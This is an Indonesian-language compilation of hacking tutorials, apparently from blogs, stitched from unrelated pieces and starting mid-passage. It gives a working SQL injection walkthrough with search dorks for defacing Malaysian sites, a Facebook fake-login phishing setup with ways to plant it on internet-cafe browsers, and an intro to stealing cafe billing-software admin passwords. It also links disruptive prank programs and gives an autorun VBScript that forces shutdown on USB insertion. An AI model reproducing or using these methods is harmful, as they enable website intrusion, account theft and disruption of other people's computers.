terus misalnya kalo buat deface situs malaysia tinggal tambah site:.my. contoh:
inurl:"news.php?id=" site:.my
buat negara lain juga bisa d ganti.
3. untuk yang pakai manual cek di google/bing:
contoh: http://site.com/index.php?id=1' <- You have an error in your
SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line 1
berarti Webnya bisa di hack
untuk yang pakai scanner : udah disediain web yang bisa dihack
4. lalu coba anda tambahkan kata: order by 1-- sampai menuju titik error
example:
http://site.com/index.php?id=1 order by 1-- <-- no error
http://site.com/index.php?id=1 order by 2-- <-- no error
http://site.com/index.php?id=1 order by 3-- <-- no error
http://site.com/index.php?id=1 order by 4-- <-- ERROR..!
5. nah yang kita ambil adalah bagian 3-nya (yang error ndak usah)
sekarang coba hapuskan order by 4-- , lalu diganti dengan :
http://site.com/index.php?id=-1 union all select 1,2,3--
(pada bagian warna merah (samping id) dikasih - dan pada setelah angka
id, dikasih union all select 1,2,3-- <<-- dimana pada order by
tidak terjadi error)
6. nah pasti keluar angka dibagian wesitenya, contoh saya ambil angka 2. lalu coba angka 2 diganti menjadi @@version:
ex:
http://site.com/index.php?id= union all select 1,@@version,3--
7. jika keluar angka versi 5.0.1 comunity log (atau yang lain << yang penting versi 5) berarti lanjutkan
kalau keluar versi 4 tinggalkan saja dan cari web lain..!!
8. nah coba @@version diganti jadi group_concat(table_name) dan
disamping union all select 1,2,3 ditambahkan from
information_schema.tables where table_schema=database()
ex:
http://site.com/index.php?id= union all select
1,group_concat(table_name),3 from information_schema.tables where
table_schema=database()--
9. nah disitu keluar beberapa table yang mungkin ada table berisi users
ataupun admin. contoh keluar table bernama users, lalu hex kata "users"
oke langsung saja. 1. silahkan anda daftar di http://www.700megs.commengapa saya suruh anda daftar disana ? di web hosting sana sangat gratis dan support php juga dari pada di ripway.com bila tidak bisa terdaftar langsung saja masuk di : http://www.700megs.com/register.jsp
2. setelah anda berhasil mendaftar di700megs.com masuk ke FILE MANAGER...hapus file index.html.(akan ada di Cpanel masing2 nantinya) 3. oke, kita mulai praktek kita. yang dibutuhkan adalah file index.php dan write.php sebagai inti fakelogin silahkan download scriptnya dahulu disiniatau di http://www.ziddu.com/download/5023245/scriptFakeloginFacebook.rar.htmlukuran cuma 9kb.4. setelah anda download. Disana ada dua file sebut saja index dan write kedua-duanya silahkan anda upload di 700megs.comyang tadi anda sudah daftar. 5. lalu tes terlebih dahulu index.php yg telah kalian upload dan login dari situ, klo berhasil.. akan ada file baru ;Password.txt [bertujuan sebagai tempat dimana userID dan password yang akan tertampung di facebook fakelogin kamu]
6, alright! selesai sampai di sini. . .
untuk penyebarannya silahkan dengan cara masing2...
disini saya cm kasih contoh satu untuk pengambilan secara paksa account2 facebook mania.. buka file index diwww.700megs.comkalian..ambil URL nya.. [penting]
terus untuk pengguna firefox: buka tools>option>main
preview:
disni
fungsinya kita mengarahkan agar browser waktu pertama kali dibuka
langsung mengarah ke file kita tadi. memungkinkan hasil buruan kalian
lebih banyak nantinya. boleh di sebar ke komputer temen/di warnet2 kesayangan.
atau..
bisa juga menyebarkan dengan cara seperti ini
kamu buat account baru,di yahoo,gmail,ato sejenisnya dengan nick Facebook@ or something like that. diatas cm contoh...silahkan kamu buat seni sendiri enjoy.. mudahkan ?? semoga berhasil . . . Untuk Mengoptimalkan Url Phising. gunakan salah satu cara yang dapat anda baca di snie
IndoBilling
merupakan software Billing untuk warnet, game online maupun offline,
persewaan komputer, kursus, rental pengetikan, laboratorium sekolahan,
dll. ---> hasil Googling :D
Nah, kali ini saya dapat artikel dari http://spyrozone.net/ yang akan memandu Anda untuk mendapatkan password Admin dan Operator indoBilling.
Aha.. gini aja dech skenarionya, biar Anda nggak terlalu dosa dan nggak masuk kategori terlalu jahat
(-_-")
Anda Ngenet di sebuah warnet yang super mahal. Nah, begitu tombol STOP
pada billing Anda klik, Anda baru ingat bahwa ada file penting yang
belum Anda salin. Mau login lagi.. tentunya ntar kena biaya tambahan
dunk karena billing udah berjalan, apalagi jika file yang disalin agak
banyak sehingga agak menyita waktu. Nah, jika Anda punya account
Operator atau account Admin, Anda bisa login tanpa harus terkena biaya.
-freeze
-snow
-earthquake
-random colours
-mouse and lines
-puzzle
Lihat efeknya dibawah
Puzzle
Mouse And Lines
Masih banyak lagi deh.. Tapi jangan salah cara menghentikannya pun
sulit loh.. Buka task manager gag bisa. Klik tombol start gag bisa.. So
bagaimana, Cukup Tekan ESC doang kok.. hhee Silahkan dicoba
Download : http://www.4shared.com/file/sphJ8tz7/140_Joke.html
Software 2
Nah
kalau yang ini namanya Key joke! Fungsinya bikin lampu disco nih..
Sama seperti script yang saya berikan dulu. Tampilannya seperti yang
disamping tuh.. Ini sih masih biasa gag kaya yang diatas tadi..
Ow iya tapi sebelumnya jangan kaget ye kalau ada pesan banyak seperti iniKarena ini juga ulahnya ni software. Bisa di close kok..
Download : http://www.4shared.com/file/37YiIUYK/KeyJoke.html
Software 3
Wah kali ini parah banget nih. Bisa bikin stress
juga. Sampai sekarang saya pun belum tau cara ngatasinnya. Nama
softwarenya Stoerung, sepertinya bahasa jerman, pas install pun
berbahasa jerman. Software ini meng-invert warna desktop kita
berkali-kali secara berkala. Namun efeknya, menurut saya bisa merusak
VGA card, dan ini juga bisa bikin komputer lemot.. Ini pun sama dengan
software seblumnya. Dy mengeluarkan alert seperti software 2 namun
lebih banyak
Download : http://www.4shared.com/file/gA961mVj/InstallStoerung.html
Masih ada 46 software lagi yang bisa kalian download untuk ngerjain temen lw.. dan efeknya mantep2 juga loh! Lihat disini http://www.rjlpranks.com/pranks/
Ingin tahu bangaimana mengamankan isi flashdisk agar tidak dapat dibaca oleh orang lain?
Cara termudah yaitu menggunakan password. Jadi, jika ada seseorang yang menginputkan password salah, maka yang terjadi komputer akan shutdown secara otomatis.
Inilah cara mengamankan isi flashdisk dengan Password:
Buka aplikasi Notepad, caranya bisa dengan Start->All
Programs->Accessories->Notepad atau buka RUN ketikkan Notepad dan
Enter.
Copy dan paste script berikut ini di Notepad.
on error goto 0
dim s,quest,sd,m,winpath,fs set sd=createobject(”Wscript.shell”)
set fs=createobject(”Scripting.FileSystemObject”)
set winpath=fs.getspecialfolder(0)
set s=wscript.createobject(”wscript.shell”)
do while quest=”"
quest=inputbox(”Masukkan PASSWORD, Jika anda salah dalam memasukkan password, maka komputer akan shutdown otomatis.”,”http://zonabaru.blogspot.com”)
if quest=”" then
m=MsgBox(”Sorry you don’t have the password…!”, 0+0+48, “http://zonabaru.blogspot.com”)
end if
loop
if quest=”Tulis passwordnya” then
s.run “shutdown -a”
sd.run winpath & “explorer.exe /e,/select, ” & Wscript.ScriptFullname
else
s.run “shutdown -s -t 0″
end if
Tulis password Anda di bagian “Tulis passwordnya”, dan hati-hati dengan huruf besar dan kecil.
Simpan file dengan memilih tipe all files, beri nama “passwordfd.vbs” (tanpa tanda kutip)
Setelah selesai, untuk pengaturan otomatis setelah flashdisk
dimasukan di PC, buka Notepad baru lagi, dan copy paste script berikut
:
[Autorun]
shellexecute=wscript.exe passwordlock.vbs
action=Flashdisk sudah pakai password
Di bagian script action di atas dapat diubah sesuai dengan keinginan Anda
Simpan file dengan memilih tipe all files, beri nama “autorun.inf” (tanpa tanda kutip)
Kemudian pindahkan kedua file yakni autorun.inf dan passwordfd.vbs ke flashdisk Anda.
Langkah terakhir, sembunyikan file autorun.inf dan passwordfd.vbs
dengan cara klik kanan pada masing-masing autorun.inf dan
passwordfd.vbs lalu pilih properties centang kotak yang ada di tanda
hidden. Selesai.